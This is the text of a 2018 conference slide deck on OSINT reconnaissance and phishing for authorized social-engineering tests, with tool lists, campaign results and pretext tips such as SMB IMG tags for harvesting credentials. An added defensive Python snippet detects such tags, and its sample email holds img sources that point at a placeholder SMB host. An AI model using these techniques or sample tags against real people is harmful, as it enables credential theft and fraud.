1 of 25

A Proven Methodology for Open-Source Intelligence Gathering and Social Engineering

SE-RI, June 16th 2018

Presented by Émilie St-Pierre and Robert Stewart

whoami - Émilie St-Pierre

  • Security Analyst for Rapid7
  • 5+ years in the infosec community
  • Soft spot for SE, OSINT, and Privacy
  • Twitter: @L4bF0x

whoami - Robert Stewart

  • Security Consultant for Rapid7
  • 7+ years in the infosec community
  • Soft spot for SE, OSINT, and Physical Security
  • Twitter: @RizzyRong

Overview

  • OSINT Methodology for ESE
  • Results: What Works? What Doesn’t Work?
  • Tips and Tricks
  • Free Phishing Templates!

Storytime!

Setting Clear Goals

Setting Goals

  • What are you looking to measure/test?
    • User behavior
    • Infiltration
    • Detection
  • What type of data are you or your client expecting?
  • Is this the first time, the nth time?
    • Will the engagement be recurring?
  • Will you be integrating an educational component?
  • Will multiple pretexts be used during an engagement?

OSINT Target Areas

  • Technology
  • People
  • Presence
  • Industry

Technology

Domain & Subdomain Enumeration

  • https://appsecco.com/books/subdomain-enumeration/cheatsheets/techniques_cheatsheet.html
  • https://github.com/ChrisTruncer/EyeWitness

Open services (passive search)

  • https://www.shodan.io/search?query=weyland+industries
  • https://censys.io/ipv4?q=weyland+industries

Technology

  • Repositories + Secrets
    • https://github.com/search?q=weyland+industries
    • https://github.com/michenriksen/gitrob

  • Searching through cloud storage: AWS, Azure, etc.
    • https://github.com/jordanpotti/AWSBucketDump
    • https://github.com/mwrlabs/Azurite

  • What AV/Security appliance are they running?
    • Job postings (if not in subdomains)

People

Employee Names, Emails and Titles:

  • connect.data.com
  • LinkedIn
  • https://github.com/initstring/linkedin2username
  • https://github.com/SimplySecurity/SimplyEmail

Customers:

  • Google-Fu: “i am a customer of Weyland Industries” ...

Industry

Compliance & Regulations:

  • https://law.justia.com/cfr/

Legal Cases

  • https://dockets.justia.com/
  • https://pcl.uscourts.gov/pcl/index.jsf ($)
  • https://www.accessdata.fda.gov/scripts/warningletters/wlFilterByCompany.cfm

Presence

  • Social Media:
    • https://inteltechniques.com/menu.html
  • Physical Locations
  • Sensitive files
    • https://github.com/leebaird/discover
  • Searching for proprietary or unique terms

Storytime with Robby

Results

A Sampling of 60 Reports from 2015 - 2018

Data points?

  • Was OSINT Performed
  • Number of Emails Discovered
  • Number of Customer Provided
  • Type of Pretext
  • Logo/Signature in Pretext E-mail?
  • Creds Compromised

OSINT

Types of Pretext

Let’s look at some Pretexts!

What Works

  • Targeted salutations
  • Using a domain similar to your target
  • Using categorized domains
  • Certificates
  • Customized signatures

What Doesn’t Work (most of the time)

  • Spoofing a domain that uses protections (i.e. SPF, DKIM and DMARC)
  • Overly-lengthy
  • Non-customized signatures

What Works? - (Harvesting Credentials)

What Doesn’t Work? - (Harvesting Credentials)

What Works? - (Execute Payload)

What Doesn’t Work? - (Execute Payload)

SMB IMG Tags to Harvest Creds!!

  • Include it on phishing emails to capture creds
  • Include it on landing pages to capture creds
  • Include it on everything!!
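As an added defender-side example (not part of the slide deck), the check a mail gateway or blue team can run against the SMB IMG tag technique above: it parses an HTML mail body and flags every image source that would make a Windows mail client reach out over SMB (file: or smb: URLs and bare UNC paths). The sample body and its hostnames are constructed placeholders.

```python
from html.parser import HTMLParser

# Constructed sample mail body (hostnames are placeholders): one ordinary
# https-hosted image next to two images that point at an SMB share.
SAMPLE_EMAIL_HTML = r"""<html><body>
<p>Hi Jane, please review the attached invoice.</p>
<img src="https://cdn.example.invalid/logo.png" alt="logo">
<img src="file://\\collector.example.invalid\share\pixel.png" width="1" height="1">
<img src="\\collector.example.invalid\share\signature.png" alt="">
</body></html>"""


class ImgSrcCollector(HTMLParser):
    """Collect the src attribute of every <img> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "img":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def is_smb_image_source(src):
    """True when rendering this image source would trigger an SMB connection.

    Covers file: URLs, smb: URLs and bare UNC paths (two leading backslashes).
    On Windows a file: URL with a hostname is resolved as a UNC path, so the
    client authenticates to that host and leaks NTLM credentials to it.
    """
    s = src.lower()
    return s.startswith(("file:", "smb:")) or s.startswith("\\\\")


def find_smb_image_sources(html):
    """Return every <img> src in the body that points at an SMB share."""
    parser = ImgSrcCollector()
    parser.feed(html)
    return [src for src in parser.sources if is_smb_image_source(src)]


if __name__ == "__main__":
    for src in find_smb_image_sources(SAMPLE_EMAIL_HTML):
        print("SMB image source:", src)
    # Network-side control: block outbound TCP 445 at the perimeter so the
    # authentication attempt never reaches an external host.
```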

Other Tips and Tricks

  1. Porfect grammerr
  2. Using SSL + cert
  3. Domain categorization
  4. Connect with your inner marketer
  5. Host malicious things in the cloud: AWS is your best friend

Free Pretexts

https://github.com/L4bF0x/PhishingPretexts

Questions?

Émilie St-Pierre

Emilie_St-Pierre@Rapid7.com

Twitter: @L4bF0x

Robert Stewart

Robert_Stewart@Rapid7.com

Twitter: @RizzyRong

Free Pretexts: https://github.com/L4bF0x/PhishingPretexts

Slides: https://goo.gl/U6qiiy